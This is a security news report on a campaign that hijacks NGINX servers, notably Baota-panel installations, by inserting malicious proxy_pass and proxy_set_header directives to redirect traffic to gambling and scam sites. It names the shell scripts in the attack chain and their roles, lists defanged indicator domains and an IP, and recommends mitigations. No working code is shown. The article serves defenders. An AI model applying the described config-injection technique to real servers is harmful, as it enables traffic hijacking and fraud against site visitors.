Cybercriminals Exploit NGINX Servers to Divert Web Traffic to Malicious Sites
A sophisticated cyberattack campaign has emerged, wherein threat actors are compromising NGINX servers to clandestinely redirect web traffic to malicious destinations. These attackers, previously associated with React2Shell exploits, are now focusing on NGINX configurations, particularly those managed via the Baota (BT) panel, which is extensively utilized across Asia.
Mechanism of the Attack
Unlike traditional malware deployment, the perpetrators manipulate legitimate server configuration files. By embedding malicious directives within NGINX’s location blocks, they intercept user traffic and reroute it through servers under their control, often without immediate detection by the site owners.
Central to this attack is the misuse of the `proxy_pass` directive—a standard NGINX feature intended to forward traffic to backend servers, such as PHP applications. The attackers reconfigure this directive to divert users to their own malicious domains, including gambling and scam sites. To further obfuscate their activities, they employ the `proxy_set_header` directive, ensuring that the hijacked traffic retains headers that appear legitimate, thereby complicating detection through standard logging mechanisms.
Automated Attack Workflow
The campaign utilizes an automated sequence of shell scripts to facilitate the attack:
– zx.sh (The Orchestrator): Initiates the environment and downloads necessary tools, serving as the entry point for the attack chain.
– bt.sh (Baota Injector): Scans for Baota panel configurations and injects malicious code, targeting `/www/server/panel/vhost/nginx`.
– 4zdh.sh (Advanced Injection): Injects payloads into NGINX configurations after validation, focusing on generic Linux NGINX installations.
– zdh.sh (Advanced Injection): Similar to 4zdh.sh, with added configuration verification; it also collects and uploads the list of hijacked domains.
– ok.sh (Exfiltration): Acts as an entry point for the attack chain, sending data to the attackers’ command-and-control (C2) server.
Targeted Domains and Indicators of Compromise
The campaign predominantly targets Asian Top-Level Domains (TLDs) such as .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites.
Administrators are advised to scrutinize their NGINX configuration files for unexpected `proxy_pass` directives pointing to the following known malicious domains:
– xzz.pier46[.]com: Suspected C2/malware infrastructure; active (unverified); observed in malicious campaigns.
– ide.hashbank8[.]com: Suspected C2/malware infrastructure; active (unverified); used for attacker communications.
– th.cogicpt[.]org: Suspected C2/malware infrastructure; active (unverified); potential exfiltration endpoint.
Additionally, network logs indicating traffic to IP address 158.94.210[.]227 may signify active communication with the attackers’ infrastructure.
Mitigation Strategies
To defend against such attacks, administrators should implement the following measures:
1. Regular Configuration Audits: Periodically review NGINX configuration files for unauthorized modifications, especially unexpected `proxy_pass` directives.
2. Update and Patch Systems: Ensure that all server software, including NGINX and associated management panels like Baota, are up-to-date with the latest security patches.
3. Restrict Access: Limit access to server management interfaces and configuration files to authorized personnel only.
4. Monitor Network Traffic: Utilize intrusion detection systems (IDS) to monitor for unusual outbound traffic patterns that may indicate data exfiltration or communication with malicious domains.
5. Implement Web Application Firewalls (WAF): Deploy WAFs to filter and monitor HTTP traffic between a web application and the Internet, providing an additional layer of security.
Conclusion
The exploitation of NGINX servers through configuration manipulation underscores the evolving tactics of cybercriminals. By leveraging legitimate server features for malicious purposes, attackers can achieve their objectives with minimal detection. It is imperative for organizations to adopt proactive security measures, conduct regular system audits, and stay informed about emerging threats to safeguard their digital assets.
